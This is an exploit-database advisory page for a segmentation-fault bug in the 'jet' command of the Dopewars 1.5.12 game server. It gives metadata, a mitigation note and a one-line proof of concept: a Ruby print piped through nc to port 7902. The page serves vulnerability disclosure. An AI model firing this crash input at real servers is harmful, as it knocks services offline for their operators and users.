header-logo
Suggest Exploit
vendor:
Dopewars
by:
Doug Prostko
8.8
CVSS
HIGH
Segmentation Fault
20
CWE
Product Name: Dopewars
Affected Version From: 1.5.12
Affected Version To: 1.5.12
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
Unknown

jet command in Dopewars 1.5.12

The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to a lack of input validation. The exploit can be triggered by sending a crafted input to the application using the 'nc' command.

Mitigation:

This issue is resolved in the SVN version of the application.
Source

Exploit-DB raw data:

## Description ##

The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation.

## POC ##

ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902

## Fix ##

This issue is resolved in the SVN version of the application.

## Discovered by Doug Prostko